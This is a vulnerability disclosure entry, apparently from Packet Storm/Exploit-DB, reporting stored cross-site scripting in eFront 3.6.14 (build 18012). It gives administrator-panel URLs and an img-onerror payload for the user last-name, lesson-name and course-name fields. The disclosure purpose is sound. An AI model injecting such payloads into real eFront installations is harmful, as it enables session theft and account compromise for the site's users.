eFront 3.6.14 Cross Site Scripting

2013-12-12T00:00:00
ID PACKETSTORM:124400
Type packetstorm
Reporter sajith
Modified 2013-12-12T00:00:00

Description

                                        
                                            `###########################################################  
  
EDB Note: Screenshot provided by exploit author.  
  
###########################################################  
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple Parameters  
[~] Author: sajith  
[~] version: eFront v3.6.14- build 18012  
[~]Vendor Homepage: http://www.efrontlearning.net/  
[~] vulnerable app link:http://www.efrontlearning.net/download  
###########################################################  
  
  
  
POC by sajith shetty:  
  
[###]Log in with admin account and create new user  
  
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1  
  
(Home � Users � Administrator S. (root) � New user)  
  
Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x  
onerror=prompt(1);> ]  
  
  
  
[###]create new lesson option (  
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php  
?  
  
ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss  
  
[payload:"><img src=x onerror=prompt(1);> ]  
  
  
  
[###]create new courses option(  
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php  
?  
  
ctg=courses&add_course=1) where "Course name:" filed is vulnerable to  
stored XSS  
  
`